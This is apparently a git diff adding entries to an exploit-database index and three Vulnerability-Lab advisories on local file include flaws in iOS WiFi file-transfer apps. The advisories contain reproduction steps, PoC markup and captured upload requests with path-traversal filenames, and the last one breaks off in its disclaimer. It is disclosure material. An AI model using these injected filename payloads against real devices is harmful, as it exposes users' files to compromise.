diff --git a/files.csv b/files.csv
index 4f17aa67f..7fc1e7d8a 100755
--- a/files.csv
+++ b/files.csv
@@ -18087,7 +18087,7 @@ id,file,description,date,author,platform,type,port
 20812,platforms/windows/remote/20812.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (3)",1997-11-20,m3lt,windows,remote,0
 20813,platforms/multiple/remote/20813.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (4)",1997-11-20,MondoMan,multiple,remote,0
 20814,platforms/windows/remote/20814.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (5)",1997-11-20,"Dejan Levaja",windows,remote,0
-20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (1)",2001-05-01,storm,windows,remote,0
+20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 - .printer ISAPI Extension Buffer Overflow Vulnerability (1)",2001-05-01,storm,windows,remote,0
 20816,platforms/windows/remote/20816.c,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (2)",2001-05-01,"dark spyrit",windows,remote,0
 20817,platforms/windows/remote/20817.c,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (3)",2005-02-02,styx,windows,remote,0
 20818,platforms/windows/remote/20818.txt,"Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (4)",2001-05-01,"Cyrus The Great",windows,remote,0
@@ -30295,3 +30295,20 @@ id,file,description,date,author,platform,type,port
 33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance Multiple Command Restriction Weakness Local Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0
 33624,platforms/php/webapps/33624.txt,"vBulletin <= 3.5.4 Multiple Cross Site Scripting Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0
 33625,platforms/php/dos/33625.php,"PHP <= 5.3.1 'session_save_path()' 'safe_mode' Restriction-Bypass Vulnerability",2010-02-11,"Grzegorz Stachowiak",php,dos,0
+33626,platforms/php/webapps/33626.txt,"PHPBTTracker+ 2.2 - SQL Injection",2014-06-03,"BackBox Linux Team",php,webapps,80
+33627,platforms/ios/webapps/33627.txt,"NG WifiTransfer Pro 1.1 - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8080
+33628,platforms/ios/webapps/33628.txt,"Files Desk Pro v1.4 iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8081
+33629,platforms/ios/webapps/33629.txt,"Privacy Pro v1.2 HZ iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,56380
+33630,platforms/ios/webapps/33630.txt,"TigerCom My Assistant 1.1 iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8080
+33631,platforms/ios/webapps/33631.txt,"AllReader 1.0 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080
+33632,platforms/ios/webapps/33632.txt,"Bluetooth Photo-File Share 2.1 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080
+33634,platforms/php/webapps/33634.txt,"CommodityRentals CD Rental Software 'index.php' SQL Injection Vulnerability",2010-02-11,"Don Tukulesto",php,webapps,0
+33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service Vulnerability",2008-07-31,"Rémi Denis-Courmont",linux,dos,0
+33636,platforms/php/webapps/33636.sh,"Interspire Knowledge Manager 5 'callback.snipshot.php' Arbitrary File Creation Vulnerability",2010-02-03,"Cory Marsh",php,webapps,0
+33637,platforms/php/webapps/33637.txt,"Webee Comments Component 1.1/1.2 for Joomla! index2.php articleId SQL Injection",2009-11-15,"Jeff Channell",php,webapps,0
+33638,platforms/php/webapps/33638.txt,"Webee Comments Component 1.1/1.2 for Joomla! Multiple BBCode Tags XSS",2009-11-15,"Jeff Channell",php,webapps,0
+33639,platforms/php/webapps/33639.txt,"Joomla! EasyBook 2.0.0rc4 Component Multiple HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0
+33640,platforms/windows/dos/33640.py,"AIMP <= 2.8.3 '.m3u' File Remote Stack Buffer Overflow Vulnerability",2010-02-12,Molotov,windows,dos,0
+33641,platforms/php/webapps/33641.txt,"Joomla! F!BB Component 1.5.96 RC SQL Injection and HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0
+33642,platforms/windows/remote/33642.html,"Symantec Multiple Products Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0
+33643,platforms/php/webapps/33643.txt,"CMS Made Simple 1.6.6 Local File Include and Cross Site Scripting Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0
diff --git a/platforms/ios/webapps/33627.txt b/platforms/ios/webapps/33627.txt
new file mode 100755
index 000000000..677696bdb
--- /dev/null
+++ b/platforms/ios/webapps/33627.txt
@@ -0,0 +1,208 @@
+Document Title:
+===============
+NG WifiTransfer Pro 1.1 - File Include Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1260
+
+
+Release Date:
+=============
+2014-04-28
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1260
+
+
+Common Vulnerability Scoring System:
+====================================
+6.5
+
+
+Product & Service Introduction:
+===============================
+The easiest way to transfer files between iPhones or with computers! WifiTransfer enables fast wireless file transfer between 
+iPhones or with computers with a simple scan. WifiTransfer enables simple and ultra fast file transfer between iPhones over 
+Wi-Fi networks. Without any additional setup, just a QRCode scan will do. The target iPhone doesn`t have to install WifiTransfer. 
+An iPhone with an ARBITRARY scanner will do. (However, with WifiTransfer installed on the target iPhone, you will have better 
+control on the transfer process.)  In addition to transfer files between iPhone/iPad, you can also remotely manage files on your 
+iPhone right from your desktop computer. Supported browsers: Safari, Chrome, FireFox, Internet Explorer.
+
+(Copy of the Homepage: https://itunes.apple.com/us/app/wifitransfer-pro-instant-file/id802094784 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Notable Group WifiTransfer Pro v1.1 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-04-28:	Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Notable Group
+Product: WifiTransfer Pro - iOS Mobile Application 1.1
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include web vulnerability has been discovered in the official Notable Group WifiTransfer Pro v1.1 iOS mobile web-application. 
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path 
+commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious 
+`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs 
+in the `WifiTransfer File Management` listing context. The attacker is able to inject the local file include request by usage of the 
+`wifi interface` or by a local privileged application user account via `file sync`(app).
+
+Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute different 
+local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST. The security 
+risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5.
+
+Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth. 
+Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
+
+Request Method(s):
+				[+] [POST] - Remote
+				[+] [SYNC] - Local
+
+Vulnerable Module(s):
+				[+] WifiTransfer File Management (UI)
+
+Vulnerable Function(s):
+				[+] Upload
+
+Vulnerable Parameter(s):
+				[+] filename
+
+Affected Module(s):
+				[+] Index File Dir Listing (http://localhost:8080/)
+
+
+Proof of Concept (PoC):
+=======================
+The local file include web vulnerability can be exploited by attackers without privileged application user account and low user interaction.
+For security demonstration or to reproduce the file include web vulnerability follow the provided information and steps below to continue.
+
+Manual steps to reproduce the vulnerability ...
+
+1. Install the vulnerable wifi ios software app (https://itunes.apple.com/us/app/wifitransfer-pro-instant-file/id802094784)
+2. Start the server and activate the localhost wifi server
+3. Open the wifi interface in a browser or console > http://localhost:8080/
+4. The the directory button to choose a file for a upload
+5. Activate a session tamper to capture the request information to intercept
+6. Click the upload button and inject your own path/file request inside of the filename value
+7. Open the interface in the browser and the execution occurs in the file dir item listing context
+8. Successful reproduce of the security vulnerability via wifi user interface!
+
+Note: The inject is also possible via sync
+
+1. Add a file in the device app interface
+2. Inject the path request as payload in combination with script code and save
+3. Activate the localhost wifi interface (web-server)
+4. Open the interface in the browser and the execution occurs in the file dir item listing context
+5. Successful reproduce of the security vulnerability via app sync!
+
+
+PoC: 
+<table class="table table-hover" cellpadding="0" cellspacing="0" border="0">
+                    <thead>
+                        <tr><th>Name</th><th class="del">Action</th></tr>
+                    </thead>
+                    <tbody id="filelist">
+                    <tr><td><a href="/files/%3C./-[LOCAL FILE INCLUDE VULNERABILITY!].png" class="file"><img src="img/image.png" style="vertical-align:middle;"><span><./-[LOCAL FILE INCLUDE VULNERABILITY!].png.png</span></a></td><td class='del'><div><a href='/files/%3C./-[LOCAL FILE INCLUDE VULNERABILITY!].png' class='btn btn-info btn-sm'>Download</a><form action='/files/%3C./-[LOCAL FILE INCLUDE VULNERABILITY!].png' method='post'><input name='_method' value='delete' type='hidden'/><input name="commit" type="submit" value="   Delete   " class='btn btn-danger btn-sm' /></div></td></tr></tbody></table></iframe></span></a></td></tr></tbody>
+                </table>
+
+
+
+--- PoC Session Logs [POST] ---
+Status: 302[Found]
+POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[67] Mime Type[text/html]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   POST-Daten:
+      POST_DATA[-----------------------------2128355697111
+Content-Disposition: form-data; name="newfile"; filename="./-[LOCAL FILE INCLUDE VULNERABILITY!].png"
+Content-Type: image/png
+
+
+Reference(s):
+http://localhost:8080/
+http://localhost:8080/files
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of the vulnerable filename input value in the upload POST method request.
+Filter and encode also the name value output in the wifi interface file dir listing.
+Setup a restriction of the filename input and disallow data names with special chars.
+
+
+Security Risk:
+==============
+The security risk of the local file include web vulnerability in the wifi interface is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - LariX4 (research@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
+Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
+profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
+states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
+may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
+or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
+Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
+other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
+modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/ios/webapps/33628.txt b/platforms/ios/webapps/33628.txt
new file mode 100755
index 000000000..8d4ba698e
--- /dev/null
+++ b/platforms/ios/webapps/33628.txt
@@ -0,0 +1,285 @@
+Document Title:
+===============
+Files Desk Pro v1.4 iOS - File Include Web Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1266
+
+
+Release Date:
+=============
+2014-05-16
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1266
+
+
+Common Vulnerability Scoring System:
+====================================
+6.7
+
+
+Product & Service Introduction:
+===============================
+FileDesk is iPhone/iPad app for managing your files. Read differect kind of files,Create PDFs with different contents, Make your 
+documents/files private,Share Your files over WiFi. File Desk - A digital desk for your files. Manage your Documents/Files With File Desk.
+
+(Copy of the Homepage: https://itunes.apple.com/ag/app/file-desk-pro-documents-manager/id600550320 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official Files Desk Pro v1.4 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-05-16: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+LiveBird Technologies Private Limited
+Product: Files Desk Pro & Lite 1.4
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include web vulnerability has been discovered in the official Files Desk Pro v1.4 iOS mobile web-application. 
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system 
+specific path commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files 
+with malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path 
+include execution occcurs in the `index file dir` list of the `filesdesk` manager. The attacker is able to inject the local file 
+include request by usage of the `wifi interface` or by a local privileged application user accounts via `file sync`(app).
+
+Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to 
+execute different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the 
+request method to inject is POST. The security risk of the local file include web vulnerability is estimated as high with a 
+cvss (common vulnerability scoring system) count of 6.7.
+
+Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user 
+account with low user auth. Successful exploitation of the local file include web vulnerability results in mobile application 
+or connected device component compromise.
+
+Request Method(s):
+				[+] [POST] - Remote
+				[+] [SYNC] - Local
+
+Vulnerable Module(s):
+				[+] FilesDesk Wifi (UI)
+
+Vulnerable Function(s):
+				[+] Upload
+
+Vulnerable Parameter(s):
+				[+] filename
+
+Affected Module(s):
+				[+] Index File Dir Listing (http://localhost:8081/)
+
+
+Proof of Concept (PoC):
+=======================
+The local file/path include web vulnerability can be exploited local attackers without privileged application user account and without user interaction.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+Manual steps to reproduce ...
+1. Install the FileDesk mobile application to your iOS device (ipad or iphone)
+2. Start the local wifi web-server and share some random files
+3. Connect with another remote computer to the local web-server interface url > web.localhost:8081
+4. Start a session tamper and choose a random file to upload
+5. Submit the upload form and intercept in the session to change the vulnerable filename value to a local device file/path
+Note: Can also be combined with script codes and html tags
+6. Refresh the index and the execution of the malicious request occurs in the index file dir list (name value)
+7. Successful reproduce of the file include web vulnerability!
+
+
+PoC: 	FilesDesk Index
+
+<table border="0" cellpadding="0" cellspacing="0">
+			<thead>
+			 <tr><th>Name</th><th class="del">Delete</th></tr>
+			</thead>
+			<tbody id="filelist">
+			<tr><td><a href="/files/%3C[LOCAL FILE/PATH INCLUDE VULNERABILITY!].png" class="file"><[LOCAL FILE/PATH INCLUDE 
+
+VULNERABILITY!]">.png</a></td><td class='del'><form action='/files/%3C[LOCAL FILE/PATH INCLUDE VULNERABILITY!].png' 
+
+method='post'><input name='_method' value='delete' type='hidden'/><input name="commit" type="submit" value="Delete" class='button' 
+
+/></td></tr></tbody></table></iframe></a></td></tr></tbody>
+		</table>
+
+
+
+Vulnerable Source: 	Upload Script
+
+<script type="text/javascript" charset="utf-8">
+		var now = new Date();
+		$.getJSON("/files?"+ now.toString(),
+		function(data){
+		  var shadow = false;
+		  $.each(data, function(i,item){
+		    var trclass='';
+		    if (shadow)
+		      trclass= " class='shadow'";
+			encodeName = encodeURI(item.name).replace("'", "'");
+		  $("<tr" + trclass + "><td><a href='/files/" + encodeName + "' class='file'>" + item.name + "</a></td>" + "<td 
+
+class='del'><form action='/files/" + encodeName + "' method='post'><input name='_method' value='delete' type='hidden'/><input name=
+
+\"commit\" type=\"submit\" value=\"Delete\" class='button' /></td>" + "</tr>").appendTo("#filelist");
+		    shadow = !shadow;
+		  });
+		});
+		</script>
+
+
+--- PoC Session Logs [POST] ---
+Status: 302[Found]
+POST http://192.168.2.104:8081/files Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[67] Mime Type[text/html]
+   Request Header:
+      Host[192.168.2.104:8081]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://192.168.2.104:8081/]
+      Connection[keep-alive]
+   POST-Daten:
+      POST_DATA[-----------------------------147491436412682
+Content-Disposition: form-data; name="newfile"; filename="%3C../[LOCAL FILE/PATH INCLUDE VULNERABILITY!].png"
+Content-Type: image/png
+
+
+Status: 200[OK]
+GET http://192.168.2.104:8081/ Load Flags[LOAD_DOCUMENT_URI  LOAD_REPLACE  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[2953] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[192.168.2.104:8081]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://192.168.2.104:8081/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[2953]
+      Date[Do., 15 Mai 2014 14:27:35 GMT]
+
+
+
+
+Status: 200[OK]
+GET http://192.168.2.104:8081/files?Thu%20May%2015%202014%2016:14:57%20GMT+0200 Load Flags[LOAD_BACKGROUND  ] Gr??e des Inhalts[39] Mime Type[text/plain]
+   Request Header:
+      Host[192.168.2.104:8081]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[application/json, text/javascript, */*]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      X-Requested-With[XMLHttpRequest]
+      Referer[http://192.168.2.104:8081/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[39]
+      Cache-Control[private, max-age=0, must-revalidate]
+      Content-Type[text/plain; charset=utf-8]
+      Date[Do., 15 Mai 2014 14:27:37 GMT]
+
+
+
+
+Status: 200[OK]
+GET http://192.168.2.104:8081/%3C../[LOCAL FILE/PATH INCLUDE VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI  ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[192.168.2.104:8081]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://192.168.2.104:8081/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[0]
+      Date[Do., 15 Mai 2014 14:27:38 GMT]
+
+
+
+
+Reference(s):
+http://web.localhost:8081/[x]
+http://web.localhost:8081/files
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of the filename value in the upload POST method request.
+Disallow special chars for files and foldernames and restrict the user input. Encode and parse also the vulnerable name output value.
+
+
+Security Risk:
+==============
+The security risk of the local file include web vulnerability in the filename value is estimated as high(-).
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
+expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
+are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
+if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
+of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
+any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/ios/webapps/33629.txt b/platforms/ios/webapps/33629.txt
new file mode 100755
index 000000000..458d58ef6
--- /dev/null
+++ b/platforms/ios/webapps/33629.txt
@@ -0,0 +1,197 @@
+Document Title:
+===============
+Privacy Pro v1.2 HZ iOS - File Include Web Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1267
+
+
+Release Date:
+=============
+2014-05-23
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1267
+
+
+Common Vulnerability Scoring System:
+====================================
+6.6
+
+
+Product & Service Introduction:
+===============================
+First of all,you need to enter the password two times that means to enter the password and confirm password,please remember the password, so as 
+to avoid unnecessary trouble. Personal information manager can provide personal information service personal for you, and provide the password 
+verification to ensure the privacy and security of your, include private account, video, pictures, books, telephone, recording, encryption and 
+decryption , memos and other functions, and the personal information manager can support WiFi data backup and recovery, we hope it can give 
+quite a lot convenient to your life.
+
+( Copy of the Homepage: https://itunes.apple.com/de/app/privacy-account-video-picture/id790084948 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official Privacy Pro v1.2 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-05-22: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Huang Zhuan
+Product: Privacy [Account Video Picture Books Record] - iOS Mobile Web Application 1.2
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include web vulnerability has been discovered in the official Privacy Pro v1.2 iOS mobile web-application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system 
+specific path commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with 
+malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include 
+execution occcurs not like regular in the index list but inside of the upload formular message filename context. The attacker is able 
+to inject the local file include request by usage of the `wifi interface`. The affected service inside of the application is only the 
+privacy manager `wifi revover data` module. (localhost:56380 -restore)
+
+Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute 
+different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to 
+inject is POST. 
+
+The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) 
+count of 6.6. Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application 
+user account with low user auth. Successful exploitation of the local file include web vulnerability results in mobile application or 
+connected device component compromise.
+
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Service(s):
+				[+] WiFi Restore Data
+
+Vulnerable Module(s):
+				[+] Upload
+
+Vulnerable Parameter(s):
+				[+] filename
+
+Affected Module(s):
+				[+] Index File Dir Listing (http://localhost:56380/)
+
+
+Proof of Concept (PoC):
+=======================
+The local file/path include web vulnerability can be exploited by local network attackers with low user interaction. For security demonstration or 
+to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC: Source 
+<html><head></head><body>../.[FILE/PATH INCLUDE VULNERABILITY!] Upload successfully!</body></html>
+
+
+--- PoC Session Logs [POST] ---
+POST http://localhost:56380/upload Load Flags[LOAD_ONLY_FROM_CACHE  LOAD_FROM_CACHE  VALIDATE_NEVER  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[-1] Mime Type[unbekannt]
+   Request Header:
+      Host[localhost:56380]
+      User-Agent
+[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+  Referer[http://localhost:56380/index.html]
+   POST-Daten:
+      POST_DATA[-----------------------------57581386217946
+Content-Disposition: form-data; name="upload_file"; filename="../.[LOCAL FILE/PATH INCLUDE VULNERABILITY!].jpg"
+Content-Type: image/jpg
+
+Response Header:
+Status: 200[OK] 
+GET http://192.168.2.104:56380/index.html Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[1084] Mime Type[text/html]
+   Request Header:
+      Host[192.168.2.104:56380]
+      User-Agent
+[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+  Connection[keep-alive]
+   Response Header:
+      Content-Length[1084]
+      Content-Type[text/html]
+
+
+Reference(s):
+http://localhost:56380/index.html	(Wifi Restore Data)
+http://localhost:56380/upload		(Vulnerable File)
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure encode and parse of the upload notification message context and input value.
+Restrict the upload input and validate the context next to the data restore.
+
+
+Security Risk:
+==============
+The security risk of the local file/path include web vulnerability is estimated as high(-).
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - LariX4 (research@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
+expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
+are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
+if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
+of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
+any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
